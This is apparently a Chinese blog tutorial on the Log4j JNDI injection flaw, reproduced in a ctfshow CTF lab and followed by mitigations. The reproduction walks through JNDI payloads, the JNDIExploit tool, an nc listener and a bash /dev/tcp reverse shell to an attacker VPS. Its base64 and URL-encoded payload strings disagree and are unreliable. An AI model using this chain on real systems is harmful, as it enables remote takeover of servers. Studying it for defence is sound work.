log4j漏洞原理

2023-02-12,,

一.前置知识

1.JNDI接口

JNDI即Java Naming and Directory Interface(JAVA命名和目录接口),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。

有一个类似于字典的数据源,你可以通过JNDI接口,传一个name进去,就能获取到对象了。

2.LDAP协议

LDAP称为轻量级目录访问协议,既是一种服务,也是一种协议,是JNDI的一种底层实现,主要功能是提供命名关键字到对象的映射目录,开发人员可以通过输入名称,获取到对象的内容。

有一个类似于字典的数据源,你可以通过LDAP协议,传一个name进去,就能获取到数据。

3.RMI协议

JAVA的一种远程接口调用协议,在TCP协议上传递可序列化的Java对象,即可以实现调用远程方法和调用本地方法一样简单。

4.Log4j

Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。

二.Log4j漏洞的成因

Log4j为了输出日志时能输出任意位置的Java对象,引入了Lookup接口,这个Lookup接口可以看作是JNDI的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java的序列化或反序列化传输,从远程服务器上查找。

由于Lookup接口的原因,Log4j就暗含JNDI注入漏洞,可以联合使用JNDI+LDAP或者JNDI+RMI通过命名功能直接从远程服务器上调用文件并在本地执行。

Log4j在处理消息转换时,会按照字符检测每条日志,当日志中包含${}时,则会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容),使用LDAP或RMI协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j的漏洞。

三.漏洞复现

1.ctfshow的log4j复现

2.打开环境,写上payload:${jndi:ldap://ntoand.dnslog.cn}先用dnslog检测漏洞是否存在

3.可以看到,是有解析记录的,原理如下:

4.浅浅漏洞利用一下吧~

在远程vps上搭建LDAP服务器,并将恶意代码编译并挂在服务器上,对JAVA不太熟练,直接使用JNDIExploit工具进行搭建:

GitHub链接:Yihsiwei/Log4j-exp: 帮助你快速复现Log4j漏洞 (github.com)

下载工具后,放到公网VPS上,记得防火墙放行端口

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i X.X.X.X -p 4444

用nc监听端口

nc -lvp 5555

制作poc,通过bash -i >& /dev/tcp/x.x.x.x/5555 0>&1反弹shell

说明:

bash -i 指开启一个交互式的Shell

&符号用于区分文件和文件描述符

&表示标准输出或标准错误输出重定向到文件

0指标准输入重定向,1指标准输出重定向,2指错误输出重定向

/dev/tcp指linux下的特殊设备,可用于建立Socket连接

bash -i >& /dev/tcp/120.x.7x.2x.17x/5555 0>&1 指将标准输出重定向到/dev/tcp/ip/port端口文件中即重定向到攻击机,靶机的标准输入被重定向到了标准输出,标准输出重定向到了攻击机,因此标准输入也就重定向到了攻击机,所以可以看到攻击机输入命令并看到结果。

POC为:

${jndi:ldap://x.x.x.x:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2BJiAV2L3RjcC8xOTUuMTMzLjUuMzc1NSAwPiYx}

注意:bash -i >& /dev/tcp/x.x.x.x/5555 0>&1需要base64编码+url编码工具才能识别

base64编码后:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTUuMzLzcvNTU1NSAwPiYx

Url编码后:YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTUuMTMMzcvNTU1NPiYx

点击提交,看到shell反弹回来了

log4j漏洞攻击成功~

四、Log4j的临时缓解措施

关闭lookup功能:

(1)设置log4j2.formatMsgNoLookups=True

(2)Dlog4j2.formatMsgNoLookups=true。

(3)设置系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS为true

(4)采用防火墙对请求流量中的${jndi进行拦截,防止JNDI注入。

(5)禁止存在漏洞的业务访问外网,主动外连外网。

log4j漏洞原理的相关教程结束。

《log4j漏洞原理.doc》

下载本文的Word格式文档,以方便收藏与打印。